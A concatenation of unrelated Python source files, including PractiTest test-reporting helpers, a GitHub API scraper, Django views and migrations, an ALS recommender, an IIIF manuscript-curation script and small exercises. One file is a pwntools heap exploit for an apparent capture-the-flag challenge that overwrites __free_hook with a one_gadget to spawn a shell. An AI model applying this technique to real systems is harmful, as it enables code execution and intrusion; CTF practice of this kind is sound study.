dctSets = json.loads(r.text)
if len(dctSets["data"]) != 0:
for testSet in dctSets["data"]:
listTestSet.append(testSet)
else:
writeToLog("INFO","No Test Sets found under filter id: '" + filterId + "'")
else:
writeToLog("INFO","Bad response for get Test Set: " + r.text)
return listTestSet
#=============================================================================================================
# Function that retrieves the test Instance of a specific test in the csv file that contains the test list
#=============================================================================================================
def getTestInstanceFromTestSetFile(self, testID):
instance = ""
case_str = "test_" + testID
testSetFilePath = os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testSetAuto.csv'))
with open(testSetFilePath, 'r') as csv_mat: #windows
platform_matrix = csv.DictReader(csv_mat)
for row in platform_matrix:
if (row['case'] == case_str):
instance = row['instanceID']
break
return instance
#=============================================================================================================
    # Function that updates the test results of a specific test run in PractiTest
#=============================================================================================================
def setPractitestInstanceTestResults(self,testStatus,testID):
runningTestNum = os.getenv('RUNNING_TEST_ID',"")
TEST_LOG_FILE_FOLDER_PATH = os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'logs',str(runningTestNum)))
practiTestUpdateTestInstanceResultsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/runs.json"
if (testStatus == "Pass"):
exit_code = "0"
else:
exit_code = "1"
# upload test results with a file attachment
fileList = self.getFilesInTestLogFolder(TEST_LOG_FILE_FOLDER_PATH)
instance = self.getTestInstanceFromTestSetFile(testID)
data_json = json.dumps({'data':{'type': 'instances','attributes': {'instance-id': instance, 'exit-code': exit_code}, "files": {"data": fileList} } })
r = requests.post(practiTestUpdateTestInstanceResultsURL,
data=data_json,
auth=(LOCAL_SETTINGS_DEVELOPER_EMAIL, str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN)),
headers={'Content-type': 'application/json', 'Connection':'close'})
if (r.status_code == 200):
writeToLog("INFO","Updated test: " + testID + " as: " + testStatus)
return True
else:
writeToLog("INFO","Bad response for update instances. " + r.text)
return False
#=============================================================================================================
    # Function that creates the csv that contains the automation tests to be run
#=============================================================================================================
def createAutomationTestSetFile(self, hostname, environment, platform, testIDsDict):
platformList = ["pc_firefox","pc_chrome","pc_internet explorer","android_chrome"]
testSetFile = os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testSetAuto.csv'))
automationTestSetFileHeader = "hostname,environment,case"
for plat in platformList:
automationTestSetFileHeader = automationTestSetFileHeader + "," + plat
automationTestSetFileHeader = automationTestSetFileHeader + ",instanceID\n"
file = open(testSetFile, "w")
file.write (automationTestSetFileHeader)
for testID in testIDsDict:
sTestID = str(testID)
sTestPlatform = str(testIDsDict[testID]).split(";")[1]
if sTestPlatform != '':
platform = sTestPlatform
testPlatformLine = hostname + "," + environment + ",test_" + sTestID
for plat in platformList:
if plat == platform:
testPlatformLine = testPlatformLine + ",1"
writeToLog("INFO","Adding: " + "test_" + sTestID + " for platform: " + plat)
else:
testPlatformLine = testPlatformLine + ",0"
testPlatformLine = testPlatformLine + "," + str(testIDsDict[testID]).split(";")[0]
file.write (testPlatformLine + "\n")
file.close()
#=============================================================================================================
    # Function that sets the test set from status pending to status processed in PractiTest
#=============================================================================================================
def setTestSetAutomationStatusAsProcessed (self, prSessionID):
practiTestSetAutomationStatusAsProcessedUrl = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/sets/" + str(prSessionID) + ".json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL)
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
data = {"data": { "type": "sets", "attributes": {"custom-fields": { "---f-30327": "Processed"}} } }
r = requests.put(practiTestSetAutomationStatusAsProcessedUrl,headers = headers, data = json.dumps(data))
if (r.status_code == 200):
writeToLog("INFO","Session: " + str(prSessionID) + " updated as processed")
return True
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
return False
#=============================================================================================================
    # Function that sets the test instance custom field
    # customFieldId example: "---f-38302"
#=============================================================================================================
def updateInstanceCustomField(self, instanceId, customFieldId, customFieldValue):
practiTestSetAutomationStatusAsProcessedUrl = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/instances/" + str(instanceId) + ".json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL)
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
data = {"data": { "type": "instances", "attributes": {"custom-fields": { customFieldId: str(customFieldValue)}}}}
r = requests.put(practiTestSetAutomationStatusAsProcessedUrl,headers = headers, data = json.dumps(data))
if (r.status_code == 200):
return True
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
return False
#=============================================================================================================
# Function that gets all the file names in a given folder
#=============================================================================================================
def getFilesInTestLogFolder(self,path):
        # Check on which platform we run ('darwin' also contains 'win', so match the prefix)
        if sys.platform.startswith('win'):
delimiter = "\\"
else:
delimiter = "/"
files = []
fileList = os.listdir(path)
for file in fileList:
with open(os.path.abspath(os.path.join(path,file)), "rb") as fileObj:
fileBase64Utf8 = base64.b64encode(fileObj.read()).decode('utf-8')
files.append({"filename": self.getDateAndTime() + '__' + fileObj.name.split(delimiter)[len(fileObj.name.split(delimiter)) - 1], "content_encoded": fileBase64Utf8})
return files
#=============================================================================================================
# Return current date and time using strftime, for example: 21-02-2018_16:34
#=============================================================================================================
def getDateAndTime(self):
now = datetime.datetime.now()
return now.strftime("%d-%m-%Y_%H:%M")
|
import requests
import json
from pprint import pprint
# Gets user information
url1 = f"https://api.github.com/users?"
data = requests.get(url).json()
user_list = []
for i in data:
user_list.append(i['login'])
for i in user_list:
url = "https://api.github.com/users/{}/repos".format(i)
data = requests.get(url).json()
with open("User_Repos.json", "a") as outfile:
json.dump(data,outfile)
# Gets repos related to REST written in Java
url2 = f"https://api.github.com/search/repositories?q=language:Java&topic=REST"
data = requests.get(url).json()
f = open("Java_Rest.json", "w")
with open("Java_Rest.json", "a") as outfile:
json.dump(data,outfile)
|
#!/usr/bin/env python3
print("Name:Tyler Sperle")
slicingFile = open('slicing-file.txt', 'r')
listfiletext = slicingFile.readlines()
slicingFile.close()
A = listfiletext[24::3]
print(A)
B = listfiletext[2:5]
print(B)
C = listfiletext[12:-9][::-1][::2]
print(C)
D = listfiletext[10:-14]
print(D)
E = listfiletext[6:-18][::-1]
print(E)
quote = (A+B+C+D+E)
print("".join(quote))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Will create a new synthetic_cascades_thresholds.txt
"""
import pylab
num_cascades = 4
num_stages = 800
thresholds = [0]*num_stages
if False:
# 2011 cascade (CVPR submission time)
score_0 = -0.01
score_1250 = -0.03
score_2000 = -0.01
for i in range(num_stages):
if i < 1250:
t = ((score_1250 - score_0)*i/1250) + score_0
else:
t = ((score_2000 - score_1250)*(i - 1250)/(2000 - 1250)) + score_1250
thresholds[i] = t
else:
# 2012 cascade (ECCV workshop submission time)
from scipy.interpolate import interp1d as interpolate_1d
curve_samples_x = [0, 6, 11, 45, 60,
180, 370, 500, 1000, 1350, 1500, 1750, 2000]
curve_samples_y = [-0.002, -0.0078, -0.007, -0.011, -0.013,
-0.018, -0.02, -0.023, -0.0227, -0.0215, -0.0245, -0.0145, -0.006]
spline_order = 1
curve = interpolate_1d(curve_samples_x, curve_samples_y, kind=spline_order)
for i in range(num_stages):
thresholds[i] = curve(i)
data = [thresholds] * num_cascades
data = pylab.array(data)
filename = "synthetic_cascades_thresholds.txt"
pylab.savetxt(filename, data)
print "Created", filename
|
# encoding: utf-8
from tastypie.fields import *
|
from pwn import *
import time
import sys
def add(size):
proc.sendlineafter(b':', b'1')
proc.sendlineafter(b':', f'{size}'.encode())
def free(offset):
proc.sendlineafter(b':', b'2')
proc.sendlineafter(b':', f'{offset}'.encode())
def write(data):
proc.sendlineafter(b':', b'3')
proc.sendafter(b':', data)
def exploit():
if len(sys.argv) <= 1:
input('attach to pid: {}'.format(proc.proc.pid))
proc.recvuntil(b':P ')
printf = int(proc.recvline(), 16)
libc = printf - 0x62830
log.info('libc: ' + hex(libc))
free_hook = libc + 0x1e75a8
malloc_hook = libc + 0x1e4c30
one_gadget = libc + 0x106ef8
#one_gadget = libc + 0xe237f
#libc2program = libc + 0x1eb5e0
libc2program = libc + 0x1ef4e0
magic_hook = libc + 0x1e40a8
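    # Added explanatory comments (hedged; the offsets above are assumed to match
    # the challenge's libc): the large add()/free() pair appears to groom the
    # heap, the first write() then redirects a freed chunk's forward pointer
    # towards __free_hook, so the following allocations hand back memory
    # overlapping __free_hook, which is overwritten with a one_gadget address;
    # the final free(0) triggers the hook.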
add(0x20d30)
free(0x20d40)
add(0x18)
write(p64(free_hook)[:6])
add(0x68)
add(0x68)
write(p64(one_gadget)[:6])
free(0)
return
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc eof.ais3.org 10106'
connect = connect.split(' ')
if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['./tt_re'], env={'LD_LIBRARY_PATH': './'})
exploit()
proc.interactive()
|
from django.shortcuts import render
from django.http import HttpResponse
from .models import Meetups
def home(request):
return render(request,'meetm/home.html')
def user_home(request):
context = {
'meetup': Meetups.objects.all()
}
return render(request,'meetm/user_home.html', context)
def moderator_home(request):
return render(request,'meetm/moderator_home.html')
def user_signup(request):
return render(request,'meetm/user_signup.html')
def plan_meeting(request):
return render(request,'meetm/plan_meeting.html')
|
from .. import Interpreter, adapter
from ..interface import Block
from typing import Optional
import random
class FiftyFiftyBlock(Block):
def will_accept(self, ctx : Interpreter.Context) -> bool:
dec = ctx.verb.declaration.lower()
return any([dec=="5050",dec=="50",dec=="?"])
def process(self, ctx : Interpreter.Context) -> Optional[str]:
        if ctx.verb.payload is None:
            return None
result = random.choice(["", ctx.verb.payload])
return result
|
import sys
import os
import numpy as np
import math
class ALS:
def __init__(self):
print("init als")
    # original rating table: an m x n rating matrix
def simple_train_set(self):
train = np.array(
[[3, 4, 5,2],
[0, 1, 1,3],
[0, 0, 1,2]]
)
return train
    # compute the masked squared reconstruction error
def evel_error(self,q,x,y,w):
return np.sum((w * (q - np.dot(x,y))) ** 2)
def eval(self, train, max_iteration):
w = train.copy()
for i in range(train.shape[0]):
for j in range(train.shape[1]):
if(train[i][j] > 0.5):
w[i][j] = 1
else:
w[i][j] = 0
m,n = train.shape
lambda_ = 0.1
n_factors = 2
error = 0
x = 3 * np.random.rand(m,n_factors)
y = 3 * np.random.rand(n_factors,n)
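        # Alternating least squares update (descriptive comments added): with Y
        # fixed, X solves the regularized normal equations
        #   (Y Y^T + lambda*I) X^T = Y R^T,
        # and symmetrically for Y with X fixed. Note that these solves use the
        # full `train` matrix rather than the mask `w`, so unobserved entries
        # are effectively treated as zeros.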
for i in range(max_iteration):
x = np.linalg.solve(np.dot(y,y.T) + lambda_ * np.eye(n_factors),np.dot(y,train.T)).T
y = np.linalg.solve(np.dot(x.T,x) + lambda_ * np.eye(n_factors),np.dot(x.T,train))
error = self.evel_error(train,x,y,w)
return x,y,error
if __name__ == '__main__':
als = ALS()
train = als.simple_train_set()
print(train)
x,y,error = als.eval(train,20)
print("X矩阵:")
print(x)
print("Y矩阵:")
print(y)
print("差错值:")
print(error)
|
import sys
n = int(sys.stdin.readline())
time = list(map(int, sys.stdin.readline().split(' ')))
time = sorted(time)
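# Note (added): serving in ascending order of time is the greedy choice that
# minimizes the total waiting time; `incul` accumulates each person's
# completion time and `deagi` keeps the running prefix sum of service times.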
incul = 0
deagi = 0
for v in time:
incul += deagi + v
deagi += v
print (incul)
|
# Generated by Django 3.1.4 on 2020-12-18 22:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('recorder', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Manufacturer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kk', models.IntegerField(default=12)),
],
),
migrations.AlterField(
model_name='instantcontent',
name='contentType',
field=models.IntegerField(choices=[(1, 'Text & Image'), (2, 'Location'), (3, 'Voice')], null=True),
),
migrations.AddField(
model_name='instantcontent',
name='manufacturer',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='recorder.manufacturer'),
),
]
|
import urllib.request
from bs4 import BeautifulSoup
import csv
from time import sleep
import pandas as pd
import json
import os
from PIL import Image
import yaml
import requests
import sys
import argparse
import Levenshtein
df = pd.read_excel('/Users/nakamurasatoru/git/d_genji/kouigenjimonogatari.github.io/src/data/metadata.xlsx', header=None, index_col=None)
configs = {}
for i in range(len(df.index)):
uri = df.iloc[i, 0]
if not pd.isnull(uri):
row_num = df.iloc[i, 2]
if int(row_num) == 1:
title = df.iloc[i, 3]
vol = df.iloc[i, 6]
page = df.iloc[i, 1]
if vol not in configs:
configs[vol] = {
"data" : {}
}
configs[vol]["data"][title] = page
for vol in configs:
config = configs[vol]
koui = config["data"]
VOL = str(vol).zfill(2)
'''
if VOL != "51" and False:
continue
'''
print(VOL)
path = '../../docs/iiif/nijl_kuronet/'+VOL+'.json'
if not os.path.exists(path):
continue
with open(path) as f:
df = json.load(f)
members = df["selections"][0]["members"]
    ################## Matching
map = {}
indexedObj = {}
for line in koui:
map[line] = []
for i in range(len(members)):
label = ""
            # previous line (-1)
if i - 1 >= 0:
label += members[i-1]["label"] + "/"
            # current line
member = members[i]
label += member["label"]
            # next line (+1), disabled below
'''
if i + 1 <= len(members) - 1:
label += "/" + members[i+1]["label"]
'''
score = Levenshtein.distance(line, label.replace("/", ""))
            score = score / max(len(line), len(label.replace("/", "")))  # normalize by the longer string length
obj = {
"label" : label,
"main" : member["label"],
"score" : score,
"member_id" : member["@id"],
"index" : i
}
map[line].append (obj)
indexedObj[i] = obj
    ################## Aggregation
prev_index = 0
    # for each line of the Koui Genji (collated) text
for line in map:
print(str(koui[line])+"\t"+line)
obj = map[line]
        # partial slice (disabled)
# obj = obj[prev_index:]
        # sort candidates by ascending score
score_sorted = sorted(obj, key=lambda x:x["score"])
flg = True
for i in range(len(score_sorted)):
data = score_sorted[i]
index = data["index"]
'''
if i < 10:
print(i, data["index"], data["score"], data["member_id"].split("/canvas/")[1], data["label"])
'''
# if index - prev_index < 50:
if flg:
# print("******:")
prev_index = index + 1
# if prev_index - 1 < len(obj):
# data = obj[prev_index - 1]
index = data["index"]
if index > 0:
data = indexedObj[index - 1]
table = '''
<table class="table">
<tr>
<th>項目</th>
<th>値</th>
</tr>
<tr>
<td>大成番号</td>
<td>'''+str(koui[line])+'''</td>
</tr>
<tr>
<td>校異源氏テキスト</td>
<td>'''+line+'''</td>
</tr>
<tr>
<td>KuroNet翻刻</td>
<td>'''+data["main"]+'''</td>
</tr>
<tr>
<td>KuroNet翻刻(前後を含む3行)</td>
<td>'''+data["label"]+'''</td>
</tr>
</table>
'''
                ########### build the ID used for the marker
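                # Added note: the lines below rewrite the matched member's IIIF
                # xywh fragment into a 1x1-pixel marker point, scaling y down to
                # about 5/6 of its original value (falling back to 800 when that
                # would be 0) and centring x inside the original box.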
member_id = data["member_id"]
# member_id = member["@id"]
sss = member_id.split("#xywh=")
canvas_id = sss[0]
xywh = sss[1].split(",")
d = 5
y = int(int(xywh[1]) * d / (d+1))
if y == 0:
y = 800
w = 1
x = int(xywh[0]) + int(int(xywh[2]) / 2)
member_id = canvas_id+"#xywh="+str(x)+","+str(y)+","+str(w)+",1"
###########
members.append({
"@id" : member_id,
"@type": "sc:Canvas",
"description": "",
"label": "["+str(len(members) + 1)+"]",
"metadata": [
{
"label": "p",
"value": koui[line]
},
{
"label": "校異源氏テキスト",
"value": line
},
{
"label": "KuroNet翻刻",
"value": data["main"]
},
{
"label": "KuroNet翻刻(前行を含む)",
"value": data["label"]
},
{
"label": "Annotation",
"value": [
{
"@id": member_id,
"@type": "oa:Annotation",
"motivation": "sc:painting",
"resource": {
"@type": "cnt:ContentAsText",
"chars": table,
"format": "text/html",
"marker": {
"border-color": "red",
"@type": "dctypes:Image",
"@id": "https://nakamura196.github.io/genji_curation/icon/red.png#xy=16,16"
}
},
"on": member_id
}
]
}
]
})
flg = False
print("----------------")
curation = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@id": df["@id"],
"@type": "cr:Curation",
"label": "Character List",
"selections": [
{
"@id": df["@id"] + "/range1",
"@type": "sc:Range",
"label": "Characters",
"members": members,
"within" : df["selections"][0]["within"]
}
]
}
f2 = open(path.replace("/nijl_kuronet/", "/nijl_kuronet_taisei_all/"), 'w')
json.dump(curation, f2, ensure_ascii=False, indent=4,
sort_keys=True, separators=(',', ': '))
|
#!/usr/bin/env python
import os, sys, tempfile, subprocess
class_path = '"/Users/noji/Dropbox/tmp/stanford-corenlp-full-2015-12-09/*"'
input_dir = '/Users/noji/Dropbox/data/penn3/PARSED/MRG/WSJ/'
output_dir = os.path.dirname(os.path.abspath( __file__ )) + '/../section/'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
def run_corenlp(tree_dir_path, out_path):
tmp = tempfile.NamedTemporaryFile()
subprocess.check_call('cat %s/* > %s' % (tree_dir_path, tmp.name), shell=True)
tmp.seek(0)
subprocess.check_call('java -cp %s edu.stanford.nlp.trees.EnglishGrammaticalStructure \
-treeFile %s -conllx -basic -originalDependencies > %s' % (class_path, tmp.name, out_path), shell=True)
dirs = os.listdir(input_dir)
for dir_num in dirs:
if (len(dir_num) == 2):
print 'processing %s...' % dir_num
run_corenlp(os.path.join(input_dir, dir_num), os.path.join(output_dir, dir_num))
print 'done.'
|
word = str(input("Give me a word to check if it is a Palindrome:"))
rev_word = word[::-1]
if word == rev_word:
print ("The word is a palindrome")
else:
print ("The word is not a palindrome")
|
#https://www.wsy.com/search.php?accurate=&search_type=item&q=%E7%94%B7%E8%A3%85
# low priority
|